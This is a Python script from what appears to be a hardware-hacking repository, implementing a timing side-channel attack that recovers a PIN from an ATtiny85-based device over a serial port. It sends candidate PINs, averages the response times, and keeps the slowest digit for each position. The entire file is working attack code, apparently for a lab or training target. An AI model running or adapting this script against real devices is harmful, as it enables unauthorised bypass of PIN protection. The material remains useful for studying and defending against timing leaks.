Newer
Older
Hardware / SideChannel / ATtiny85_Timing_Attack / multi_digit_attack.py
0xRoM on 11 Feb 4 KB initial commit
import serial
import time
import argparse

# Constants
SERIAL_PORT = '/dev/ttyUSB0'
BAUD_RATE = 9600
PREFIX = ""
ATTEMPTS = 3
DELAY = 0.8
KEYSPACE = ["1", "2", "3", "4"]
BYTE_SIZE = 10  # 8 data bits + 1 start bit + 1 stop bit

def get_response_time(serial_port, message):
    """
    Function to send message, wait for response, and measure response time.
    """
    serial_port.flushInput()
    first_line_received = False

    for i, char in enumerate(message):
        time.sleep(DELAY)
        serial_port.write(char.encode())
        if i < len(message)-1:
            raw_response = serial_port.readline()

    raw_response = b''
    while True:
        byte = serial_port.read(1)
        if byte:
            if byte == b'\n' and not first_line_received:
                first_line_received = True
            elif first_line_received:
                start_time = time.time()
                break

    final_response = serial_port.readline().decode(errors='ignore').strip()
    response_time = time.time() - start_time

    print(f"\rSent: {message}, Response: {final_response}, Response Time: {response_time:.4f} seconds", end='', flush=True)
    time.sleep(DELAY)
    return final_response, response_time

def calculate_average_response_time(serial_port, message):
    """
    Calculate average response time over multiple attempts.
    """
    total_time = 0
    response_times = []
    for _ in range(ATTEMPTS):
        response, response_time = get_response_time(serial_port, message)
        total_time += response_time
        response_times.append(response_time)
    
    average_time = total_time / ATTEMPTS
    print(f"\r{message} average: {average_time:.4f} seconds - ", flush=True)
    return average_time, response_times

def identify_sequence(serial_port, length):
    """
    Identify the complete sequence of characters by sending test sequences.
    """
    prefix = ""
    for pos in range(length):
        slowest_avg = float('-inf')
        best_digit = None

        for key in KEYSPACE:
            message = prefix + key + key * (length - len(prefix) - 1)
            print(f"Testing: {message}", end='', flush=True)
            avg_time, _ = calculate_average_response_time(serial_port, message)
            if avg_time > slowest_avg:
                slowest_avg = avg_time
                best_digit = key

        prefix += best_digit
        print(f"Best digit for position {pos + 1}: {best_digit} (Average response time: {slowest_avg:.4f} seconds)")

    return prefix

def estimate_serial_time(message_length):
    """
    Estimate time taken for serial communication based on baud rate.
    """
    bits_per_second = BAUD_RATE
    chars_per_second = bits_per_second / BYTE_SIZE
    time_per_char = 1 / chars_per_second
    return message_length * time_per_char

def main():
    parser = argparse.ArgumentParser(description="PIN length argument")
    parser.add_argument("length", type=int, help="Length of the PIN to test")
    args = parser.parse_args()
    length = args.length

    max_attempts = len(KEYSPACE) * length * ATTEMPTS
    serial_time = estimate_serial_time(length * len(KEYSPACE))
    estimated_time = max_attempts * (DELAY + DELAY + serial_time + 0.05)  # Adjusted for serial delay and print time

    print(f"########################################################")
    print(f"# Attempts: {ATTEMPTS}  -    Delay: {DELAY}            ")
    print(f"# Maximum possible attempts: {max_attempts}            ")
    print(f"# Estimated maximum time: {estimated_time:.2f} seconds ")
    print(f"########################################################")

    start_time = time.time()  # Record the start time
    start_timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(start_time))
    print(f"Started at {start_timestamp}")


    with serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1) as serial_port:
        print(f"Starting sequence identification on port {SERIAL_PORT} with PIN length {length}...")
        sequence = identify_sequence(serial_port, length)
        print(f"########################################################")
        print(f"# Identified sequence: {sequence}")
        print(f"########################################################")

    end_time = time.time()  # Record the end time
    end_timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(end_time))
    elapsed_time = end_time - start_time  # Calculate total time taken

    # Convert elapsed time to appropriate format
    if elapsed_time > 3600:  # More than 1 hour
        hours = int(elapsed_time // 3600)
        minutes = int((elapsed_time % 3600) // 60)
        time_str = f"{hours}h {minutes}m"
    elif elapsed_time > 60:  # More than 1 minute
        minutes = int(elapsed_time // 60)
        seconds = int(elapsed_time % 60)
        time_str = f"{minutes}m {seconds}s"
    else:
        time_str = f"{elapsed_time:.2f} seconds"

    print(f"\nFinished at {end_timestamp}")
    print(f"Total execution time: {time_str}")

if __name__ == '__main__':
    main()